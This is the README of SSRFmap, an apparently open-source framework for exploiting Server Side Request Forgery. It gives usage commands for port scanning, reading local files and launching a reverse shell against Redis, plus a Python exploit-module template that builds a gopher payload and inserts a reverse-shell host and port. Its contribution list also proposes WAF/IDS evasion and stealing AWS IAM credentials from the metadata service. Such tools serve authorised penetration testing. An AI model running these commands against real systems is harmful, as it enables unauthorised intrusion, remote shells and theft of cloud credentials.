88 lines
3.5 KiB
Markdown
88 lines
3.5 KiB
Markdown
|
# SSRFmap
|
||
|
|
||
|
> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. It's often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
|
||
|
|
||
|
## Guide / RTFM
|
||
|
|
||
|
```powershell
|
||
|
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
|
||
|
[--lport LPORT]
|
||
|
|
||
|
optional arguments:
|
||
|
-h, --help show this help message and exit
|
||
|
-r REQFILE SSRF Request file
|
||
|
-p PARAM SSRF Parameter to target
|
||
|
-m MODULES SSRF Modules to enable
|
||
|
-l HANDLER Start an handler for a reverse shell
|
||
|
--lhost LHOST LHOST reverse shell
|
||
|
--lport LPORT LPORT reverse shell
|
||
|
```
|
||
|
|
||
|
The default way to use this script is the following.
|
||
|
|
||
|
```powershell
|
||
|
# Launch a portscan on localhost and read default files
|
||
|
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
|
||
|
|
||
|
# Triggering a reverse shell on a Redis
|
||
|
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||
|
|
||
|
# -l create a listener for reverse shell on the specified port
|
||
|
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
|
||
|
```
|
||
|
|
||
|
## Contribute
|
||
|
|
||
|
I <3 pull requests :)
|
||
|
Feel free to add any feature listed below or a new service.
|
||
|
|
||
|
- --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g: `127.0.0.1 -> [::] -> 0000: -> ...`
|
||
|
- networkscan - same a portscan, we want to discover machines in the same network
|
||
|
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
|
||
|
|
||
|
The following code is a template if you wish to add a module interacting with a service.
|
||
|
|
||
|
```python
|
||
|
from core.utils import *
|
||
|
import logging
|
||
|
|
||
|
name = "servicename in lowercase"
|
||
|
description = "ServiceName RCE - What does it d"
|
||
|
author = "Name or pseudo of the author"
|
||
|
|
||
|
class exploit():
|
||
|
|
||
|
def __init__(self, requester, args):
|
||
|
logging.info("Module '{}' launched !".format(name))
|
||
|
|
||
|
# Data for the service
|
||
|
ip = "127.0.0.1"
|
||
|
port = "6379"
|
||
|
data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
|
||
|
payload = wrapper_gopher(data, ip , port)
|
||
|
|
||
|
# Handle args for reverse shell
|
||
|
if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:"))
|
||
|
else: payload = payload.replace("SERVER_HOST", args.lhost)
|
||
|
|
||
|
if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:"))
|
||
|
else: payload = payload.replace("SERVER_PORT", args.lport)
|
||
|
|
||
|
# Send the payload
|
||
|
r = requester.do_request(args.param, payload)
|
||
|
```
|
||
|
|
||
|
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
||
|
|
||
|
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||
|
|
||
|
## Thanks to the contributors
|
||
|
|
||
|
- ???
|
||
|
|
||
|
## Inspired by
|
||
|
|
||
|
- [All you need to know about SSRF and how may we write tools to do auto-detect - Auxy](https://medium.com/bugbountywriteup/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea)
|
||
|
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||
|
- [Blog on Gopherus Tool -SpyD3r](https://spyclub.tech/2018/blog-on-gopherus/)
|
||
|
- [Gopherus - Github](https://github.com/tarunkant/Gopherus)
|